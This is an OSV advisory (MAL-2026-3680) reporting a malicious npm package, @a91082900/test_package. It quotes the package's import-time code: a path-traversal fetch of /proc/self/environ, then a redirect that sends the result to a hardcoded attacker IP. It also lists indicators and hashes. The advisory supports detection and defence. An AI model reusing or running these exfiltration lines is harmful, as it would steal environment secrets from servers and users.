MAL-2026-3680

See a problem?

Import Source

https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@a91082900/test_package/MAL-2026-3680.json

JSON Data

https://api.osv.dev/v1/vulns/MAL-2026-3680

Published

2026-05-12T18:00:18Z

Modified

2026-05-13T20:22:15.882993Z

Summary

Malicious code in @a91082900/test_package (npm)

Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254)

The package's main file (index.js) executes at module load, with no exports and no user-invoked API. On import it issues fetch('/api/notes?id=/self/proc/environ') and then assigns top.location = 'http://128.199.217.232/?notes=' + encodeURIComponent(data), relaying whatever the vulnerable endpoint returns (a path-traversal-shaped request for the server process's environment variables) to a hardcoded bare IPv4 address over plain HTTP. Package metadata is placeholder ('no description', generic author handle) and there is no library functionality — this is a PoC/exfil payload packaged as an npm module. Any installer bundling this into a web application would redirect victim browsers to the attacker IP with exfiltrated data in the query string. Import-time execution + hardcoded bare-IP C2 + plaintext HTTP + a request path specifically crafted to read /proc/self/environ together leave no benign interpretation.

Database specific

{
    "malicious-packages-origins": [
        {
            "id": "IN-MAL-2026-002549",
            "modified_time": "2026-05-12T19:03:07Z",
            "source": "amazon-inspector",
            "versions": [
                "0.0.5"
            ],
            "import_time": "2026-05-13T20:10:59.684865697Z",
            "sha256": "b8349cd7ce2c9ac2321dce8f80e5a46c0064b382fb7e54e975ff27a2dcab1254"
        }
    ]
}

References

https://www.npmjs.com/package/@a91082900/test_package/v/0.0.5

Credits

- Amazon Inspector - FINDER
- - actran@amazon.com

Affected packages

npm / @a91082900/test_package

Package

Name: @a91082900/test_package; View open source insights on deps.dev
Purl: pkg:npm/%40a91082900/test_package

Affected ranges

Affected versions

0.*

0.0.5

Database specific

cwes

[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]

source

"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/@a91082900/test_package/MAL-2026-3680.json"

indicators

{
    "evidence_files": [
        {
            "tlsh": "4bf0dc0b88e004275f97040b9b62047aa715f817caf4d8713aae431a1f85e60d0702e3",
            "path": "index.js",
            "sha256": "d2336e7e177c17da9310bbf1bde62a714d5369b0d334b7e34065a4969ea1ccd2"
        }
    ],
    "package_integrity": [
        {
            "filename": "test_package-0.0.5.tgz",
            "hashes": {
                "sha512_sri": "sha512-POWq7EUvxvBu1E7lmICVq2qc+qa8kcaYdeYAW7tDIhEReNLFNRSYSvGkGj17boeS2ASU8amp4jvnW4+g4x7JeQ==",
                "sha1": "2de1cb4b995ed0e3e15607ad85dcd0e73c18439a"
            }
        }
    ],
    "urls": [
        "http://128.199.217.232/?notes="
    ],
    "domains": [
        "128.199.217.232"
    ]
}